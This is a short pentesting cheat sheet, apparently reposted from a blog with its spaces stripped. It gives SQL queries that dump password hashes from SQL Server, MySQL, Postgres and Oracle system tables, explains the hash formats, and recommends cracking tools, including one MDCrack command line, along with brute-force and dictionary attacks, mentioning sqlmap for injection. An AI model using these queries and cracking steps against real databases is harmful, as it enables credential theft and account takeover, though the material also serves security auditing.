有没access也可以抓取的?
  各种数据库密码hash获取语句,也可以直接使用sqlmap这个注入工具!
  SQLServer2000:-
  SELECTpasswordfrommaster。dbo。sysxloginswherename='sa'
  0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
  2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
  0×0100-constantheader
  34767D5C-salt
  0CFA5FDCA28C4A56085E65E882E71CB0ED250341-casesenstivehash
  2FD54D6119FFF04129A1D72E7C3194F7284A7F3A-uppercasehash
  cracktheuppercasehashin'cainandabel'andthenworkthecasesentivehash
  SQLserver2005:-
  SELECTpassword_hashFROMsys。sql_loginswherename='sa'
  0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
  0×0100-constantheader
  993BF231-salt
  5F36CC441485B35C4D84687DC02C78B0E680411F-casesensitivehash
  crackcasesensitivehashincain,trybruteforceanddictionarybasedattacks。
  update:-followingbernardo'scomments:-
  usefunctionfn_varbintohexstr()tocastpasswordinahexstring。
  e。g。selectnamefromsysxloginsunionallselectmaster。dbo。fn_varbintohexstr(password)fromsysxlogins
  MYSQL:-
  InMySQLyoucangeneratehashesinternallyusingthepassword(),md5(),orsha1functions。password()isthefunctionusedforMySQL'sownuserauthenticationsystem。Itreturnsa16-bytestringforMySQLversionspriorto4。1,anda41-bytestring(basedonadoubleSHA-1hash)forversions4。1andup。md5()isavailablefromMySQLversion3。23。2andsha1()wasaddedlaterin4。0。2。
  *mysql<4。1
  mysql>SELECTPASSWORD('mypass');
  +——————–+
  |PASSWORD('mypass')|
  +——————–+
  |6f8c114b58f2ce9e|
  +——————–+
  *mysql>=4。1
  mysql>SELECTPASSWORD('mypass');
  +——————————————-+
  |PASSWORD('mypass')|
  +——————————————-+
  |*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4|
  +——————————————-+
  Selectuser,passwordfrommysql。user
  Thehashescanbecrackedin'cainandabel'
  Postgres:-
  PostgreskeepsMD5-basedpasswordhashesfordatabase-levelusersinthepg_shadowtable。Youneedtobethedatabasesuperusertoreadthistable(usuallycalled"postgres"or"pgsql")
  selectusename,passwdfrompg_shadow;
  usename|passwd
  ——————+————————————-
  testuser|md5fabb6d7172aadfda4753bf0507ed4396
  usemdcracktocrackthesehashes:-
  $wineMDCrack-sse。exe–algorithm=MD5–append=testuserfabb6d7172aadfda4753bf0507ed4396
  Oracle:-
  selectname,password,spare4fromsys。user$
  hashescouldbecrackedusing'cainandabel'orthc-orakelcrackert11g
  MoreonOraclelater,iamabitbored…。